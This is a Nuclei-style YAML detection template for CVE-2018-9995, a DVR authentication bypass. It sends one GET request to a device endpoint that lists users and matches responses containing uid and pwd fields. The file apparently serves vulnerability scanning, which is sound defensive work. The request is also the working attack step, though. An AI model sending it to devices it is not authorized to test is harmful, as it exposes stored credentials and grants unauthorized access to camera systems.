28 lines
545 B
YAML
28 lines
545 B
YAML
id: CVE-2018-9995
|
|
info:
|
|
name: DVR Authentication Bypass
|
|
author: princechaddha
|
|
severity: high
|
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-9995
|
|
tags: cve,cve2018,auth-bypass
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/device.rsp?opt=user&cmd=list"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "\"uid\":"
|
|
- "\"pwd\":"
|
|
- "\"view\":"
|
|
- "playback"
|
|
condition: and
|
|
part: body
|